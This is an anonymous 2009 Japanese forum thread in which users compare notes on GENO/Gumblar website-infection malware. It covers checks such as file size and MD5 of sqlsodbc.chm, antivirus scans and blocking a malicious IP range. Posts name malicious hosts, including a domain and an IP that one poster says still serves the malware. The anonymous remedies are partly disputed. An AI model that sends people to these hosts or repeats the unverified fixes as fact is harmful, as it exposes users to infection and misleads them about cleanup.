09/05/16 05:06:47
感染してた人いないです?
話がききたい
51:名無しさん@お腹いっぱい。
09/05/16 05:08:12
>>24
あのさ、avastで開こうとしたら警告出るでしょ?
で、すぐにIE閉じた場合、チェストに移動できる?
俺、ウイルスチェストに移動できなくてエラーになったことあるんだが、
この場合、感染してしまったのかな?
ただ、TempInternetFileの中身を全削除してから、全ドライブを
avastでチェックかけたところ、ウイルスは出なかった
regeditも正常に起動できた
ウイルスに感染したページを開く前に、avastが警告出して
未然防止できたってことで良いのかな?
ただ、何でチェストに移動できなかったのかが謎だけど・・・
すぐにIE閉じたから?
52:名無しさん@お腹いっぱい。
09/05/16 05:08:19
>>50
前スレ見ろ。
53:名無しさん@お腹いっぱい。
09/05/16 05:08:27
>>49
自分もすぐ家族とPCに疎い友達に言ったよ
最初はふーんて感じだったけど
小林製薬の事はなしたら「気をつける」ってさ
54:名無しさん@お腹いっぱい。
09/05/16 05:09:00
sqlsodbc
サイズ 49.5 KB (50,727 バイト)
ディスク上のサイズ 52.0 KB (53,248 バイト)
これって( )内の数字が正しいから大丈夫だよね?
55:名無しさん@お腹いっぱい。
09/05/16 05:11:13
>>51
自分の場合は「そのまま閉じなさい」みたいに言われたから閉じるボタン押したよ
いつもだったらチェストに移動とか出るけどその時は「閉じる」一択だったわ
多分大丈夫
こちらもウィルスチェックしたけど何も出なかった
56:名無しさん@お腹いっぱい。
09/05/16 05:13:01
PC疎い人が「気をつける」って
何を気をつけるんだろうな…
ウィルスに感染してるサイトは特別な状態になってるとか
思ってそうだ
57:名無しさん@お腹いっぱい。
09/05/16 05:13:46
>>55
あれ、「チェストに移動する(推奨)」とか出なかった?
通常は、「削除」「チェストに移動」のどっちか選べるよね?
あまりに危険だから、チェストに移動できないタイプだったのかな?
58:名無しさん@お腹いっぱい。
09/05/16 05:15:33
>>54
md5で確認したファイルとサイズは同じだね
気になるならmd5見たほうがいいんじゃないかな
59:名無しさん@お腹いっぱい。
09/05/16 05:18:08
>>57
うん。普通のタイプのウィルスだったら「チェストに移動」が出るんだけど
今回のは出なかったよ
こういう事あるんだなー
60:名無しさん@お腹いっぱい。
09/05/16 05:19:27
>>59
俺の場合、「チェストに移動」って出てきたよ
だけど、クリックしたのに「エラー」になって移動できなかった
61:名無しさん@お腹いっぱい。
09/05/16 05:20:44
>>56
まぁウィルスという言葉が片隅にあるのとないのじゃ対策の仕方も変わるしいいんでないの
62:名無しさん@お腹いっぱい。
09/05/16 05:22:23
とりあえずはavastさんがどうにかしてくれてるわけね
63:名無しさん@お腹いっぱい。
09/05/16 05:22:44
cmd.exeで実行してdir C:\WINDOWS\system32\sqlsodbc.chmでエンター押したら
ファイルが見つかりませんって出たんだけどこれはアウト?
さっきまで1個のファイル 50,727バイトって表示されてたんだけど、
まとめサイトにのってるニフティのサイト開いてKasperskyもダウンロードしたあと試したらこうなった
64:名無しさん@お腹いっぱい。
09/05/16 05:22:47
>>47
断言は出来ない
出来ないけどたぶん大丈夫じゃね?
このウイルスは今のところCドライブのシステム関連を改変するだけっぽいので
それ以外の場所のテキストファイルや画像・動画ファイルとかはたぶん問題ないと思う
たぶんね(責任は持てないけど)
65:名無しさん@お腹いっぱい。
09/05/16 05:24:14
>>63
それ開けてる
66:名無しさん@お腹いっぱい。
09/05/16 05:24:27
>>63
普通にエクスプローラで見てみれば?
67:名無しさん@お腹いっぱい。
09/05/16 05:26:08
今日寝ずにオンラインスキャンしたりブラウザの設定したよ...
68:名無しさん@お腹いっぱい。
09/05/16 05:26:44
>>63
キャッシュ削除すればおkってゲロさんが言ってた
69:名無しさん@お腹いっぱい。
09/05/16 05:27:59
キャッシュ消してもウィルスが消えるわけじゃないんですよね、社員さん
70:名無しさん@お腹いっぱい。
09/05/16 05:28:55
ゲロさんの言うキャッシュ削除は役に立たないってまとめwikiにあったが
71:名無しさん@お腹いっぱい。
09/05/16 05:29:16
>>38
そっちのファイルが何かわからないけど
こっちも調べたら.acmや.axがあったわ・・・・
けど、ググてみたら普通にレジストリにあるぽいんだよね・・・・
どうなんだろう
72:名無しさん@お腹いっぱい。
09/05/16 05:30:24
>>65>>66
開けてるけど1個のファイル 50,727バイトって出ないとアウトなんじゃないの
でもsqlsodbc.chmプロパティ開いてみたら50,727バイトなってた。
これはセーフなのかアウトなのか・・・
73:名無しさん@お腹いっぱい。
09/05/16 05:33:20
さっきまで女とヤりまくってたんだけど
実はウイルスのことで頭がいっぱいだったんだ。
この外国帰りの女。まさか豚ウイルス持ち帰ってねーだろな。
ってな。
74:名無しさん@お腹いっぱい。
09/05/16 05:34:02
>>72
カスペでウィルスチェックしたの?
全部
75:名無しさん@お腹いっぱい。
09/05/16 05:34:33
GENOってノートンで[94.247.2.0]-[94.247.3.255]を遮断してれば大丈夫?
その他の対策もやっといた方がいいんでしょうか
76:名無しさん@お腹いっぱい。
09/05/16 05:34:51
システムフォルダがWINDOWSじゃないとか
システムドライブがC:じゃないとか
77:名無しさん@お腹いっぱい。
09/05/16 05:35:44
>>72
お前はもうアウトだと思ってネット切っとけ…
78:名無しさん@お腹いっぱい。
09/05/16 05:38:00
>>74
カスパーインストールしようとすると「インストールノログを開くときにエラーが発生しました。
指定されたファイルの場所が存在し、書き込み可能であることを確認してください」って出てしまう
79:名無しさん@お腹いっぱい。
09/05/16 05:41:08
vipとかも蔓延してそうだな
80:名無しさん@お腹いっぱい。
09/05/16 05:41:47
>>78
まずウィルスチェックしてください
他のウィルス対策ソフトやオンラインスキャンが使えないならパソコン綺麗にしたほうが早いですね
81:名無しさん@お腹いっぱい。
09/05/16 05:46:46
Adobe Acrobat Reader自体ダウンロードしてなかったら大丈夫?
それとも対策として入れておいたほうがいい?
82:名無しさん@お腹いっぱい。
09/05/16 05:47:33
>>81
使わないなら入れなくていい
83:名無しさん@お腹いっぱい。
09/05/16 05:53:43
Java script を切ったり、各種ソフトウェアを
更新していれば、万が一書き換えが起きてるサイトを
踏んでも一応大丈夫だと思ってたんだけど
ここ数日で何か変わったのか?
84:名無しさん@お腹いっぱい。
09/05/16 05:57:29
>>83
亜種が出てきてるから何を信じればいいのかわからない状態
85:名無しさん@お腹いっぱい。
09/05/16 06:00:04
>>3
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
86:名無しさん@お腹いっぱい。
09/05/16 06:00:53
javaスクリプトは切ったんだけど、それでも一応
javaスクリプト最新版にアップデートしておいた方が良い?
87:名無しさん@お腹いっぱい。
09/05/16 06:01:58
……「同人サイト」ってなに?
エロサイト?
88:名無しさん@お腹いっぱい。
09/05/16 06:03:03
うぁあああああああああああああああああああああああああああああああああああああああああああ
ああああああああああ・・・・・・あああああああああ・・・・・あああああああああああ
ぁぁぁぁぁぁ・・・・・・
89:64
09/05/16 06:03:04
まとめwikiのdir C:\WINDOWS\system32\sqlsodbc.chmをコピってエンターだとファイルが表示されませんて出たけど
コピペのdir C:\WINDOWS\system32\sqlsodbc.chmだと1個のファイル 50,727バイトってちゃんと出た。
何が違ったのかよくわからないけど一応報告
90:名無しさん@お腹いっぱい。
09/05/16 06:07:01
>>89
正常だけど
心配ならウィルスチェックしてみたらいいじゃないの
91:名無しさん@お腹いっぱい。
09/05/16 06:11:49
普通のサイトにトラップだなんて困るわ
92:名無しさん@お腹いっぱい。
09/05/16 06:17:46
このスレですら今の状態だからもう感染爆発は止められないな
ほとんどのメーカー製PCやソフトはマニュアルがPDFで
Acrobatが標準プリインストールされてしまっている
購入後アドビまで探しに行って更新するわけがないし
リカバリすればまた古いAcrobatが再インストールされる
自分のPCにAcrobatがあることすら知らないはず
93:名無しさん@お腹いっぱい。
09/05/16 06:18:34
…げ、evalあった
放置してる上、趣向が趣向だけに
もう閲覧してる人もいないようなサイトだから
ゆっくり考えてから行動するか…
他のサイトは無事で、最優先でチェックした項目に
感染の形跡無いのは何でだろ、亜種かな
94:名無しさん@お腹いっぱい。
09/05/16 06:27:03
>>47
本当に必要なファイルはVirusTotalにかけて、
それ以外の99パーセントのファイルは、一応スキャンした後で、外付けHDDとかに退避がおすすめ。
そしてしばらく凍結。
今は完全に 悪意の攻撃者 >>>>>>>>>>>>>>>>>>>>>>>セキュリティーベンダー
だから、1ヶ月(いや、最悪半年か?)くらい、不要ファイルは寝かせて、
セキュリティーベンダーのウィルス特定精度があがってきた頃に、外付けHDDの中を再スキャン。
その時は、マカフィー、ノートン、G-Data Kaspersky など複数ソフトで検索した方がいいよ。
>>57
なんかほのぼのしているね。
avast使ってないから、なんとも言えんけど、ローカルじゃなくて、ウェブとの通信で見つけたから、
わざわざローカルに保存してチェストに移動する必要がなかったのでは?
>>75
今、凶悪なのが、そこってだけで、前は違ったみたいよ。 だから十中八九また変わる。
95:名無しさん@お腹いっぱい。
09/05/16 06:27:14
まずウイルスチェックしようよ
96:名無しさん@お腹いっぱい。
09/05/16 06:28:00
ソロだとMeteorb楽なんだけど
マルチだと火力きついんだよね
∞ないと雷は乙ってるし、氷じゃソロ辛そうだしムズイ
97:名無しさん@お腹いっぱい。
09/05/16 06:28:42
おはよおー
前スレ終わるのはえーなw
てきとーに読んでみるか
98:名無しさん@お腹いっぱい。
09/05/16 06:28:47
なんという誤爆
99:名無しさん@お腹いっぱい。
09/05/16 06:29:09
なんかのRPG?
100:名無しさん@お腹いっぱい。
09/05/16 06:30:00
>>97
同人板とやらとこのスレを行き来してる人が多かったから
かなり盛り上がってたみたい
101:94
09/05/16 06:32:32
>>86
FlashとかadobeReaderとか
URLリンク(www.java.com)
じゃなくて?
全てアンインストールするか最新じゃないと、脆弱性あるままだよ。
つまり、Javaスクリプトを切って、たとえ、このウィルスには大丈夫でも、
他のウィルスがスタンバイしている状態。
102:名無しさん@お腹いっぱい。
09/05/16 06:33:06
>>97
スレの勢いスゴすぎだよねw
俺も寝る前新スレとして登録したはずなのに、起きたら旧スレになっててワロタ
でもやっとそれだけの人が集まってきたってことなんだろうけど
103:名無しさん@お腹いっぱい。
09/05/16 06:33:32
女性同人はブログで満足せずサイト持ちが多いから影響が大きい
104:名無しさん@お腹いっぱい。
09/05/16 06:34:04
2ちゃん慣れしてるとこのウィルス本当に存在してんの?とか思ってしまう
だけど他のサイトに行って確認するのも怖いというチキン
105:名無しさん@お腹いっぱい。
09/05/16 06:35:01
>>104
こっちは小林のメールマガジンでこのウィルス知ったクチ
その時期に見てなかったから感染しなかったけどね
106:名無しさん@お腹いっぱい。
09/05/16 06:38:25
自分も>>54と同じだ
これって黒…?
107:名無しさん@お腹いっぱい。
09/05/16 06:39:32
それだけで決めてしまうのではなくって
オンラインチェックだとかPC挙動の見つつ判断したほうがいい
108:名無しさん@お腹いっぱい。
09/05/16 06:40:44
>>106
MD5でも比較した方がいい
109:名無しさん@お腹いっぱい。
09/05/16 06:41:20
カスペのオンラインスキャンに拒否られる。
やる気ねーだろ。
110:名無しさん@お腹いっぱい。
09/05/16 06:41:59
>>108
ごめん
MD5のやり方がわからん
111:名無しさん@お腹いっぱい。
09/05/16 06:42:14
ググれ
112:名無しさん@お腹いっぱい。
09/05/16 06:43:36
>>111
ググって変なサイトを見たら、また感染する危険があるだろw
ここで教えろw
113:名無しさん@お腹いっぱい。
09/05/16 06:44:20
こういう人は同人のほうのスレ行った方が優しくしてもらえる
114:名無しさん@お腹いっぱい。
09/05/16 06:44:45
MP5っと…
なんだ?ヘッケラーアンドコックって。
115:名無しさん@お腹いっぱい。
09/05/16 06:45:18
>>110
HashCheckerで探しましょう
116:名無しさん@お腹いっぱい。
09/05/16 06:47:24
URLリンク(ja.wikipedia.org)
MD5(エムディーファイブ、Message Digest Algorithm 5)とは、与えられた入力に対して128ビットのハッシュ値を出力するハッシュ関数である。
1991年に開発されたMD5は、前身であるMD4の安全性を向上させたものである。開発者はMD4と同じく、MIT教授のロナルド・リベスト。
Linuxでは md5sum、FreeBSDでは md5 というコマンドが用意されており、これを用いてメッセージダイジェストを出力することが出来る。
出力されるメッセージダイジェストは、d41d8cd98f00b204e9800998ecf8427e (入力データ長が0バイトの場合)
の様に16進数の数字が並んだテキスト形式で出力され、これをフィンガプリント(指紋)やハッシュ値、あるいは単にMD5値と呼ぶ。
「MD5チェックサム」とも良く言われる。
117:名無しさん@お腹いっぱい。
09/05/16 06:48:19
MD5は、電子署名を必要とするアプリケーション向けに開発された。RSAで署名を生成する際に、メッセージを直接対象として
署名を生成するのではなく、メッセージのハッシュ値を生成し、ハッシュ値に対して署名を生成する。
ファイルを転送する際にそのファイルが破損していないことを確認するためにも用いられる。配布する側は、
ファイル配布時にそのファイルのMD5ハッシュ値(いわゆるMD5チェックサム)も同時に配布する。受信したユーザは
手元でファイルのMD5値を計算して、配布者の提示したMD5値と一致することを確認すれば良い。このような目的に
CRCを用いることもあるが、CRCは標準が複数存在するため現在ではあまり見られない。
またファイルが改竄されていないことを証明するためにも用いられる。これにより、作成者以外による
トロイの木馬やコンピュータウイルスなどの混入を防ぐことが出来る。 しかしながら、この場合MD5値は手元で計算できるのだから、
改竄済みのファイルのMD5値が同梱されている可能性がある。従って、改竄の恐れがある場合には、
ファイルに同封されているMD5値と比較するのではなく、MD5値だけは何かしら信頼できる方法で配布者から入手する必要がある。
118:名無しさん@お腹いっぱい。
09/05/16 06:49:00
FreeBSDはインストール可能なCDイメージと、それのMD5値を同時に配布している。
(MD5値の改変はないと仮定して)インストール可能なCDイメージが、途中で改変されていないことを確認してみる。
配布サイトから、ここでは 5.1-RELEASE-i386-miniinst.iso という最小構成のインストールイメージファイルと、
CHECKSUM.MD5 というMD5値(いわゆるMD5チェックサム)の書かれたテキストファイルをダウンロードする。
md5 コマンドを、イメージファイルに実行する。
localhost% md5 5.1-RELEASE-i386-miniinst.iso
MD5 (5.1-RELEASE-i386-miniinst.iso) = 646da9ae5d90e6b51b06ede01b9fed67
CHECKSUM.MD5の中身を確認し、一致していれば破損の可能性は低いことが分かる。
localhost% cat CHECKSUM.MD5
MD5 (5.1-RELEASE-i386-disc1.iso) = 3b6619cffb5f96e1acfa578badae372f
MD5 (5.1-RELEASE-i386-disc2.iso) = 2cfa746974210d68e96ee620bf842fb6
MD5 (5.1-RELEASE-i386-miniinst.iso) = 646da9ae5d90e6b51b06ede01b9fed67
119:名無しさん@お腹いっぱい。
09/05/16 06:49:32
>>112
なにこいつw
120:名無しさん@お腹いっぱい。
09/05/16 06:50:06
ブログやなんかで記事書いてもたいして読まれて無いし意味無いかな~
121:名無しさん@お腹いっぱい。
09/05/16 06:51:09
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ 同人サイトなんてどうでもいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
122:名無しさん@お腹いっぱい。
09/05/16 06:51:38
そういやGW始まったばかりの頃にすげー重くなって
こりゃいかんとリカバリしたことあった
すごく軽くなって満足してたが今思えばウイルスに感染してたのか…
123:名無しさん@お腹いっぱい。
09/05/16 06:53:31
>>121
社員さんいいかげんにしてくださいよ
124:名無しさん@お腹いっぱい。
09/05/16 06:53:55
>>115
ありがとう
HASH CHECKER入れてみます
ネットつなげるの少し怖いなw
125:名無しさん@お腹いっぱい。
09/05/16 06:54:09
メインストリーム落ちしたOS使ってないと感染しないのにすごい盛り上がりっぷりだな
126:名無しさん@お腹いっぱい。
09/05/16 06:54:40
>>125
メインストリーム落ちしたOSって?
127:名無しさん@お腹いっぱい。
09/05/16 06:54:45
>>124
URLリンク(www.vector.co.jp)
128:名無しさん@お腹いっぱい。
09/05/16 06:55:26
NTTコミュニケーションズさん
120.29.185.234(VPS-TOKYO2)
今日も踏んでみたけど放置のままなんだなあ・・・
129:名無しさん@お腹いっぱい。
09/05/16 06:55:46
>>116
Wikipediaの説明読んでも、全く理解できないんだが・・・
結局、MD5がGENOウイルスとどう関係しているの?
130:名無しさん@お腹いっぱい。
09/05/16 06:57:22
>>128
これってどんなサイト?
131:名無しさん@お腹いっぱい。
09/05/16 06:58:01
>>120
今日はすごいヒット数になるかもよ
まだ分かってないやつ多いと思う
132:名無しさん@お腹いっぱい。
09/05/16 06:58:12
>>124
少し怖い(セキュリティ的に)と思ったなら今後対策を常に講じれば良いだけです。
それに気がついただけでも良いことだと思いますよ。
133:名無しさん@お腹いっぱい。
09/05/16 06:58:15
小林製薬のページは今でも感染ばら撒いてる最中なの?
もう改善されて感染されちゃったよっていう伝達がされてるの?
134:名無しさん@お腹いっぱい。
09/05/16 06:59:32
>>133
メルマガより
いつも「暮らしのヒントお知らせ隊」メールマガジンをご愛読いただき
誠にありがとうございます。
この度、弊社サイトの一部(「暮らしのヒントお知らせ隊」含む)に
おいて第三者による改ざんが確認され、当該期間に下記サイトを閲覧
された方にウイルス感染の恐れがあることが判明いたしました。
■閲覧により感染した可能性のある期間
5月10日(日)20時23分 ~ 5月11日(月)21時27分
■改ざんされたサイト
・暮らしのヒントお知らせ隊
・ハナノア ブランドサイト
・イージーファイバー ブランドサイト
上記期間に当該サイトにアクセスされた皆様におかれましては、誠に
お手数ではございますが、下記URLにて対応をご確認下さい。
URLリンク(www.kobayashi.co.jp)
平素から弊社サイトをご覧いただいている皆様にご迷惑をおかけしま
したこと、心よりお詫び申し上げます。
引き続きサイトの安全管理には万全を尽くしてまいりますので、今後とも
よろしくお願い申し上げます。
135:名無しさん@お腹いっぱい。
09/05/16 07:00:50
>>130
表示されないので謎
136:名無しさん@お腹いっぱい。
09/05/16 07:02:35
UAC切ってたvistaってやばいよね…?
137:名無しさん@お腹いっぱい。
09/05/16 07:03:34
>>134
ありがとう
対応されてるみたいだな
っつーか一応有名企業なのに誰か報道してくれんのか
138:名無しさん@お腹いっぱい。
09/05/16 07:04:17
>>129
意味がわからなければ半年romれ
139:名無しさん@お腹いっぱい。
09/05/16 07:05:14
>>138
ROMったらウィルス感染しちゃうわ
140:名無しさん@お腹いっぱい。
09/05/16 07:05:17
感染してる人ってしてない人より楽観的だよね
141:名無しさん@お腹いっぱい。
09/05/16 07:05:30
だから感染するんだよな
142:名無しさん@お腹いっぱい。
09/05/16 07:05:32
前スレ816
816 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2009/05/16(土) 03:13:52
>>806 ぐぐったらこんなんでました
URLリンク(detail.chiebukuro.yahoo.co.jp)
あれ?リンク先・・・日付が・・・
それとこの一文
>ブラウザの一時ファイルを削除することで、ウイルスが駆除できるでしょう。
まさかgenoはこれを見て・・・
143:名無しさん@お腹いっぱい。
09/05/16 07:07:13
>>135
ていうかNTTのくせになにやってるんだろうね
144:名無しさん@お腹いっぱい。
09/05/16 07:08:20
>>142
GENOってパソコン関係のショップなんでしょ?
ありえない…
145:名無しさん@お腹いっぱい。
09/05/16 07:08:37
>>138
ROMっているだけで感染するんだが
146:名無しさん@お腹いっぱい。
09/05/16 07:08:49
>>139
テンプレをちゃんと見ればわかるだろ
わからなければわからない自分を呪え
147:名無しさん@お腹いっぱい。
09/05/16 07:09:55
危険なIPをルーターで全部フィルタリングした
一括登録できないからマジ疲れた…寝る
148:名無しさん@お腹いっぱい。
09/05/16 07:10:09
sqlsodbc.chm ってXPだけのファイル?
149:名無しさん@お腹いっぱい。
09/05/16 07:10:17
わからないなら違う方法で確認すりゃいいのに
150:名無しさん@お腹いっぱい。
09/05/16 07:11:10
>>41
確認しようとぐぐったけど さっぱりわからんかったw
151:名無しさん@お腹いっぱい。
09/05/16 07:11:41
>>129
MD5は該当ファイルの中身を関数で計算し値を出力する。
同じファイルで計算すると同じ値になる。
*現状の*では既存ファイルの中身を書き換える。
だからMD5の値を比較すれば書きらえたかどうかが分かる。
152:名無しさん@お腹いっぱい。
09/05/16 07:11:55
改めてJavascript切ることの重要性がわかったわ
でも最近の公式サイトとかはJavascript、Flash使いまくりだからな~
めんどうなんでほとんどWikipediaで済ましてるわ
153:名無しさん@お腹いっぱい。
09/05/16 07:12:44
>>152
なんであんなにフラッシュ使うんだろうね
154:94
09/05/16 07:13:05
>>129
今のところ、感染したPCのファイルの一部が ウィルス作者に都合がいいように書き換えられるんだけど、
そんな違いが初心者にわかるわけないだろ?
もっと簡単に、
君のPCが、ウィルスに感染していない(書き換えられていないファイル) だと判断するには、
書き換えられていない正常なファイルと比較して一致すれば良い。
だが、一致しているかを判断するのも大変そうだから、ツールを使って調べるわけ。
MD5ってのはファイルの指紋みたいなもので、
正常なファイルの指紋と 君のPCの同じ名前のファイル の指紋が一致すれば
多分感染していなそうだ・・・という推測が成り立つ(感染した全部PCのファイル書き換えるとは言い切れないため)。
反対に感染しているファイルの指紋と 一致しちゃったら、100パーセント 感染しているってこと。
その指紋を取るソフトが>>124とか>>127なわけ。
155:名無しさん@お腹いっぱい。
09/05/16 07:13:43
みんなおはよう
ちなみに、Firefox系のブラウザでGoogle検索しただけで、感染したサイトが一番上ならGoogleの検索結果開いただけで感染する可能性あり。
Googleの先読み機能が影響してるので怖い方はabout:configからnetwork.prefetch-nextをfalseにすること推奨
156:名無しさん@お腹いっぱい。
09/05/16 07:13:43
>>148
Windows2000以外には存在する。
157:名無しさん@お腹いっぱい。
09/05/16 07:15:03
MD5云々は最終結論だとして、
sqlsodbcのファイルサイズを偽装したウイルスは確認されてるの?
158:名無しさん@お腹いっぱい。
09/05/16 07:15:04
>>153
制作会社がうまーなのかな
159:名無しさん@お腹いっぱい。
09/05/16 07:16:02
>>156
Meにも存在する?
160:名無しさん@お腹いっぱい。
09/05/16 07:16:30
>>155
Google以外の検索サイトは先読みしないんですかね?
161:名無しさん@お腹いっぱい。
09/05/16 07:17:01
アドバイス宜しくお願いします。
【OS】XP SP3
【使用セキュリティソフト】ウイルスバスター2009
【疑った理由】
セキュリティログを見てたらこんなログがでてた(その時間は嫁が使ってた。)
そのあとどんな処理をしたかは覚えていないらしい。
"フィッシング詐欺対策" "2009/05/08"
"時間" "URLアドレス" "偽装サイトブロック (ホスト名変換)" "脅威"
"15:55" "URLリンク(gumblar.cn)" "" "このWebサイトは安全でない可能性があります。
このWebサイトにはスパイウェアや不正プログラムが存在しているか、
またはこのWebサイトは偽のWebサイトか、
安全性が非常に低いと評価されているWebサイトです。"
"15:56" "URLリンク(gumblar.cn)" "" "このWebサイトは安全でない可能性があります。
このWebサイトにはスパイウェアや不正プログラムが存在しているか、
またはこのWebサイトは偽のWebサイトか、
安全性が非常に低いと評価されているWebサイトです。"
【症状】
今のところ自覚症状なし
【確認手段】
sqlsodbc.chmのサイズ,MD5チェック、カスペオンラインスキャン、バスターウィルススキャン
cmd.exe、regedit.exeの起動チェック、特定サイトのアクセスチェック
URLリンク(www3.atword.jp)を参考にレジストリチェック
【結果】
sqlsodbc.chmのサイズ、MD5共に問題なし。cmd.exe、regedit.exeの起動OK。CPU、メモリ使用率も問題なし。CPU、メモリ使用率も問題なし。
カスペオンラインスキャン何も検知せず。レジストリも問題なし。
バスターウィルススキャンスパイウェアは検知したが、全てクッキーにある奴だけ。ウィルスは検知していない。
この結果でほぼ感染していないと思ってますが、皆様の助言を頂きたく書込みしました。
その他チェック項目等がありましたらご指導ください。
162:名無しさん@お腹いっぱい。
09/05/16 07:17:35
心配なら一週間回線切って寝ろ
163:名無しさん@お腹いっぱい。
09/05/16 07:17:49
>>154
129じゃないんだが、その指紋にあたるのがバイト数ってことですか?
164:94 101 154
09/05/16 07:18:02
つづき。
>>129
そのファイルの場所が>>7
指紋の値が>>6
だが、>>4の最後に
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
とあるので、これで大丈夫だから感染していない! とは言い切れないわけ。
あくまで黒を特定する為の手段。
165:名無しさん@お腹いっぱい。
09/05/16 07:18:37
>>158
わざわざ重たいサイトつくって金もらうのね
166:名無しさん@お腹いっぱい。
09/05/16 07:19:38
>>165
特にゲーム会社のHPってトップページからフラッシュで重すぎるから
リンク貼られていても飛ばないようにしているわ・・・
見れるまで1分かかるとかイライラする
167:名無しさん@お腹いっぱい。
09/05/16 07:19:49
>>160
してないと思う
>>162
問題なし
あとhttp://のところはhXXp://とかにしろ
168:名無しさん@お腹いっぱい。
09/05/16 07:19:50
>>164
トン
わかりやすかった
169:名無しさん@お腹いっぱい。
09/05/16 07:19:58
Adobe Reader Speed-Upってどこで手に入るの?
170:名無しさん@お腹いっぱい。
09/05/16 07:20:35
前スレの>>216これか・・・
111 名前:GENO[sage] 投稿日:2009/05/16(土) 00:04:18 ID:Fd0/+V3h0
バイオハザードと戦国ゲームを扱っているサイトで感染確認
数日前に行った時はAVAST!が怒るくらいで済んだが次に行ったらAVAST!が激怒
もしかしたら新種か亜種か何かにここ数日で進化したか?
怒る→警告とこのサイトの通信遮断するところクリック
激怒→ウィルスをチェスト送り推奨で今現在チェストに放り込まれてる
ただ放り込まれているのはキャッシュなので過剰反応かもしれん
因みに火狐+JSカットで隔離までいったw
とりあえず最初にいった時にウィルスの報告したんだけど対応していないソフトで
検査したらしく管理人さんは大丈夫って思っている
次にいった時はAVAST!激怒したので報告むりぽ
171:名無しさん@お腹いっぱい。
09/05/16 07:20:35
>>161
大丈夫だとおもいます
ですが実際見ているわけじゃないので
精神的に不安ならばクリーンインスコ
大丈夫そうならそのままで
172:167
09/05/16 07:20:49
安価ミス
×>>162
○>>161
173:名無しさん@お腹いっぱい。
09/05/16 07:21:00
エロゲー公式サイトとかは切ってても大丈夫なとこが多い
174:名無しさん@お腹いっぱい。
09/05/16 07:21:29
>>165
取引として考える一つの指標として
命令文・タグ、がいくつ存在するかってのがある
タグ打ちよりもFlashの方が命令文が多いのならば
そっちの方が金になるってことでFlashを使うってのもあるかもしれない
175:名無しさん@お腹いっぱい。
09/05/16 07:22:00
>>166
どんだけ遅い回線だよ
176:名無しさん@お腹いっぱい。
09/05/16 07:22:57
WindowsMe使っているんだが、C:\WINDOWS\system32 に sqlsodbc.chm ってファイル無いんだが?
177:名無しさん@お腹いっぱい。
09/05/16 07:23:08
金儲けに走ると悪いことが起きるってばっちゃが
178:名無しさん@お腹いっぱい。
09/05/16 07:23:36
もうMeはお呼びじゃない
使うならオフライン専用で
179:161
09/05/16 07:24:08
直リンすみませんでした。
>>167様
ご回答有難うございます。
問題なさそうなので、安心して眠れます。
180:94 101 154
09/05/16 07:24:29
>>163
>>164に書いたとおり、指紋の値がMD5の値。
バイト数は、指紋にはならない。
バイト数(ファイルサイズ)なんて、不要なデータを追加すれば、いくらでも変えられるじゃん。
181:名無しさん@お腹いっぱい。
09/05/16 07:26:50
>>159
Meにはデフォルトではchmはいっていませんが、他ソフト導入や更新をすると入るようです
182:名無しさん@お腹いっぱい。
09/05/16 07:29:02
同人のスレ見てたらwin98の人もいた・・・
183:名無しさん@お腹いっぱい。
09/05/16 07:30:07
疎い人なら今もふらふらネットサーフィンしてるんだろな
ちょっと挙動がおかしくても気にしなかったり
なんでもOK押したりさ・・・
184:名無しさん@お腹いっぱい。
09/05/16 07:31:53
そういう時期がわたしにもありました。
185:名無しさん@お腹いっぱい。
09/05/16 07:32:08
挙動がおかしくても、Win98だからかな、古いPCだからかな
程度で済んでしまうのかもしれないな
186:名無しさん@お腹いっぱい。
09/05/16 07:32:48
同人系ってPCの買い替えサイクルすっげ速そうなイメージあったのに
そうでもないのかね
Macとりなくすのユーザーがのほほんしててうらやましい・・・
187:名無しさん@お腹いっぱい。
09/05/16 07:34:37
こんな時だけだよな「Linux使ってて良かった」って思うのは
188:名無しさん@お腹いっぱい。
09/05/16 07:34:40
質問しに来ました
もし自分のサイトにスクリプト埋め込まれた場合、セキュリティソフトは警告出しますか?
189:名無しさん@お腹いっぱい。
09/05/16 07:34:54
というかWin98だとウイルスきかなそうなイメージがあるんだが
古すぎて
そんな事はないんだよなあ
190:名無しさん@お腹いっぱい。
09/05/16 07:35:31
これ結構酷いウイルスみたいだけど、ニュー速にスレないんだな
191:名無しさん@お腹いっぱい。
09/05/16 07:35:50
同人なんて貧乏なんだから、未だに98とかMeとか使っているよ
動画サイトとかネトゲしなきゃ、普通にHPとかブログ読めるし
192:名無しさん@お腹いっぱい。
09/05/16 07:36:14
自作板住人だったのでGENO騒動早めに知って良かった
193:名無しさん@お腹いっぱい。
09/05/16 07:36:21
>>188
出るならこんなに広がってない
194:名無しさん@お腹いっぱい。
09/05/16 07:36:44
>>182
98やMeだと、そもそもFlash9までしか対応してない
恐ろしや…
195:名無しさん@お腹いっぱい。
09/05/16 07:37:13
>>188
使っているソフトによりますが、難しいでしょう。
196:名無しさん@お腹いっぱい。
09/05/16 07:37:30
>>193
じゃあ自分で感染してるのは気づかないんですね
自分のパソコンからソース見てもみえないのかな...
197:名無しさん@お腹いっぱい。
09/05/16 07:37:32
>>194
adobeのアクロバット・リーダーも最新バージョンは対応してないから
pdf文書とかも読めない場合がある・・・
198:名無しさん@お腹いっぱい。
09/05/16 07:38:22
ところで、同人スレってどこのスレのこと?
199:名無しさん@お腹いっぱい。
09/05/16 07:39:01
>>198
【管理も】同人サイト・GENOウィルス注意【閲覧も】
スレリンク(doujin板)
200:名無しさん@お腹いっぱい。
09/05/16 07:39:26
>>198
【管理も】同人サイト・GENOウィルス注意【閲覧も】
スレリンク(doujin板)l50
201:名無しさん@お腹いっぱい。
09/05/16 07:39:55
テレビはエコポイントとインフルの話題ばかり
1分でいいからウィルスの話題をたのむ
202:名無しさん@お腹いっぱい。
09/05/16 07:41:51
ボットネットの一部となり、加害者になって、警察が来るなんて考えもしてない。
「だってわかんないんだもん」で済むと思っているだろうし・・・。
ウィルスとはよく言ったものだ。
お前らも豚の媒介者とならんように、マスクと手洗いウガイはしてくれよ。
URLリンク(www3.atword.jp)
記事が更新されてる。
